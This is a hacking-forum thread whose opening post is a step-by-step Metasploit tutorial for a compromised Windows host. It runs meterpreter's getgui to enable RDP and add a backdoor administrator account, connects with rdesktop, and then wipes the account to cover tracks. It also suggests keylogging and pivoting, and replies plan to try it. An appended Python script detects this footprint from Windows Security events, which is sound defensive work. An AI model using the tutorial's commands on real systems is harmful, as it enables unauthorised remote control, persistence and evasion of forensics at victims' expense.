| HQ!! ENABLING RDP WITH METASPLOIT |

#1


Hello Hack Community. I'm quite bored and decided to make a small tutorial on how to enable a remote desktop connection using Metasploit. It's really easy if you get a meterpreter script up. Just a couple of commands and you should have it up and running and ready to have some fun with a nice view of your target machine.

LEGIT'S TUT TO-DO LIST:

[*] Enable RDP with meterpreter's getgui script.
[*] Add new user.
[*] Make sure RDP is forwarded and we can connect to it.
[*] Monitor System Uptime and user activity.
[*] Connect to RDP & have some fun. :yeye:
[*] Once done, wipe everything & clean our tracks.

[+] STEP 1,2,3 IN ONE COMMAND.
[*] OBJECTIVES:
[*] Enable RDP with meterpreter's getgui script.
[*] Add new user.
[*] Make sure RDP is forwarded and we can connect to it.

[+] We are about to use the getgui script and add a user LEGIT with the password pass, and make sure our connection is forwarded so we can connect to it remotely from our system.

PHP Code:
meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e

OPTIONS:

    -e        Enable RDP only.
    -f <opt>  Forward RDP Connection.
    -h        Help menu.
    -l <opt>  The language switch
              Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
    -p <opt>  The Password of the user

meterpreter > run getgui -u LEGIT -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language detection started
[*]     Language detected: en_US
[*] Setting user account for logon
[*]     Adding User: LEGIT with Password: pass
[*]     Adding User: LEGIT to local group ''
[*]     Adding User: LEGIT to local group ''
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
meterpreter >


[+] Now that we have RDP running and set up, it's time to move on to our next objective and monitor system boot time, uptime, user activity, etc.

[+] STEP FOUR
[*] OBJECTIVES:
[*] Monitor System Uptime and user activity.

[+] This task will not be discussed as much because I'm sure if you can exploit the system you have at least enough knowledge to monitor the system and see when it's up or not and what's going on. There are plenty of tools: you can monitor network traffic with Wireshark, use meterpreter's keyscan option and keylog the system, or try pivoting throughout the network to gain more information on users and the network layout. But I will throw in a nice bash script to help with this when you exploit a Linux system.

BASH SCRIPT:
PHP Code:
#!/bin/bash
# System summary: CPU, memory, uptime, addresses and root-disk usage.
# Sum the %CPU column of ps (header skipped) and divide by the core count.
CPUTIME=$(ps -eo pcpu | awk 'NR>1 {tot += $1} END {print tot+0}')
CPUCORES=$(grep -c '^processor' /proc/cpuinfo)

# free -m prints "Mem: total used free shared buff/cache available" and
# "Swap: total used free"; pick the columns by row label instead of by
# line number so the output format of newer procps does not break it.
echo "
System Summary (collected on $(date))

 - CPU Cores           = ${CPUCORES}
 - CPU Usage (average) = $(echo "${CPUTIME} / ${CPUCORES}" | bc)%
 - Memory free (real)  = $(free -m | awk '/^Mem:/ {print $4}') Mb
 - Memory buff/cache   = $(free -m | awk '/^Mem:/ {print $6}') Mb
 - Swap in use         = $(free -m | awk '/^Swap:/ {print $3}') Mb
 - System Uptime       = $(uptime)
 - Local IPs           = $(ip -o -4 addr show | awk '{print $4}' | cut -d/ -f1 | grep -v '^127\.')
 - Public IP           = $(dig +short myip.opendns.com @resolver1.opendns.com)
 - Disk Space Used     = $(df -h | awk '$6 == "/" {print $1 " percentage used " $5 " out of " $2 " total on " $6}')
"


[+] STEP 5 & 6
[*] OBJECTIVES:
[*] Connect to RDP & have some fun. :yeye:
[*] Once done, wipe everything & clean our tracks.

[+] I will connect to RDP using a Linux command. Windows users reading this: connecting to a remote RDP is pretty self-explanatory, so if you can't figure that out, I think you should just hang it up. So we are going to use the rdesktop command to connect.

PHP Code:
LEGIT@HF:~$ rdesktop -u LEGIT -p pass 192.168.1.103

[+] There you go. You should be connected to your remote desktop connection and viewing your target screen. Now when you're done and you want to wipe the user account and your tracks, you run this. (This is just for my computer; when you run getgui, look at the bottom of the output and it should say the command to clean everything up.)

PHP Code:
meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
[*] Running Command List ...
[*]     Running command execute -f cmd.exe -a "/c net user LEGIT /delete"
Process 288 created.
meterpreter >

Well, that's the end of this TUT, hope you guys liked it!

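The getgui run in the post above leaves a distinct footprint on the target: a new local account, that account added to the Remote Desktop Users and Administrators local groups (the group names dropped out of the pasted output), the fDenyTSConnections registry value set to 0 so the Terminal Server service accepts connections, and then an RDP logon (LogonType 10) by the new account. The script below is an added example, not part of the original post and not Metasploit code: it correlates Windows Security log events with the standard IDs 4720 (account created), 4732 (member added to a local group), 4624 (logon) and 4657 (registry value modified) and flags that sequence. The sample events are constructed for the demonstration; their field names follow the Security log's data names in simplified form (MemberName is used where the raw 4732 event carries a SID), and the hosts WS01/WS02, the accounts, the addresses and the timestamps are invented.

```python
"""Detect the host footprint of a getgui-style RDP enablement.

Added example: correlates Security-log events (4720 account created,
4732 member added to a local group, 4624 logon with LogonType 10 =
RemoteInteractive/RDP, 4657 registry value modified) to flag a newly
created account that is immediately made RDP-capable and/or used over RDP.
The sample events below are constructed for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Local groups getgui puts the new user in, and the registry value it sets
# to 0 so the Terminal Server service accepts connections.
RDP_GROUPS = {"remote desktop users", "administrators"}
RDP_DENY_VALUE = "fdenytsconnections"
WINDOW = timedelta(minutes=30)  # creation -> group add / logon correlation window

# Constructed sample events (hosts, accounts, addresses and times invented).
SAMPLE_EVENTS = [
    {"t": "2011-01-12 20:44:01", "id": 4657, "host": "WS01",
     "ObjectValueName": "fDenyTSConnections", "NewValue": "0"},
    {"t": "2011-01-12 20:44:05", "id": 4720, "host": "WS01", "TargetUserName": "LEGIT"},
    {"t": "2011-01-12 20:44:06", "id": 4732, "host": "WS01",
     "TargetUserName": "Remote Desktop Users", "MemberName": "WS01\\LEGIT"},
    {"t": "2011-01-12 20:44:07", "id": 4732, "host": "WS01",
     "TargetUserName": "Administrators", "MemberName": "WS01\\LEGIT"},
    {"t": "2011-01-12 20:48:30", "id": 4624, "host": "WS01",
     "TargetUserName": "LEGIT", "LogonType": 10, "IpAddress": "192.168.1.50"},
    # Benign noise: a helpdesk account on another host, added to a
    # non-RDP group and never logged on over RDP.
    {"t": "2011-01-12 21:10:00", "id": 4720, "host": "WS02", "TargetUserName": "helpdesk"},
    {"t": "2011-01-12 21:11:00", "id": 4732, "host": "WS02",
     "TargetUserName": "Backup Operators", "MemberName": "WS02\\helpdesk"},
    # An existing admin's RDP logon: no matching 4720, so not flagged.
    {"t": "2011-01-12 21:15:00", "id": 4624, "host": "WS02",
     "TargetUserName": "admin", "LogonType": 10, "IpAddress": "10.0.0.7"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def _user(name):
    """Normalise 'HOST\\user' or 'user' to a lower-case bare name."""
    return name.split("\\")[-1].lower()


def detect_getgui(events, window=WINDOW):
    """Return findings: one per fDenyTSConnections=0 change, and one per
    (host, account) that was created and, within `window`, added to an
    RDP-relevant local group and/or logged on over RDP (LogonType 10)."""
    created = {}                    # (host, user) -> creation time
    groups = defaultdict(set)       # (host, user) -> RDP-relevant groups joined
    rdp_logons = defaultdict(list)  # (host, user) -> RDP logon times
    findings = []

    for e in sorted(events, key=lambda ev: ev["t"]):
        host, t = e["host"], _ts(e["t"])
        if e["id"] == 4657:
            if (e.get("ObjectValueName", "").lower() == RDP_DENY_VALUE
                    and str(e.get("NewValue")) == "0"):
                findings.append({"host": host, "user": None, "severity": "medium",
                                 "reason": "fDenyTSConnections set to 0 (RDP enabled)",
                                 "time": e["t"]})
        elif e["id"] == 4720:
            created[(host, _user(e["TargetUserName"]))] = t
        elif e["id"] == 4732:
            key = (host, _user(e["MemberName"]))  # in 4732, TargetUserName is the group
            group = e["TargetUserName"].lower()
            if group in RDP_GROUPS and key in created and t - created[key] <= window:
                groups[key].add(group)
        elif e["id"] == 4624 and e.get("LogonType") == 10:
            key = (host, _user(e["TargetUserName"]))
            if key in created and t - created[key] <= window:
                rdp_logons[key].append(e["t"])

    for key, t0 in created.items():
        if groups[key] or rdp_logons[key]:
            parts = []
            if groups[key]:
                parts.append("added to " + ", ".join(sorted(groups[key])))
            if rdp_logons[key]:
                parts.append("logged on over RDP (LogonType 10)")
            host, user = key
            findings.append({"host": host, "user": user,
                             "severity": "high" if rdp_logons[key] else "medium",
                             "reason": "new local account " + " and ".join(parts),
                             "groups": sorted(groups[key]),
                             "rdp_logons": list(rdp_logons[key]),
                             "time": t0.strftime("%Y-%m-%d %H:%M:%S")})
    return findings


if __name__ == "__main__":
    for finding in detect_getgui(SAMPLE_EVENTS):
        print(finding)
```

Two caveats for real data: 4657 only appears when object-access auditing is on and the Terminal Server key carries an audit SACL, so the 4720/4732/4624 chain is the part you can rely on with default audit policy; and the cleanup command at the end of the post deletes the account (event 4726) but the correlation here keys on creation, so a short-lived account is still caught.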

RE: | HQ!! ENABLING RDP WITH METASPLOIT | #2
Nice tutorial, very detailed.


RE: | HQ!! ENABLING RDP WITH METASPLOIT | #3
Really nice tutorial! I will try this exploit. :)

Thank you..!!


RE: | HQ!! ENABLING RDP WITH METASPLOIT | #4
This is actually pretty interesting. Would love to see more metasploit tutorials around.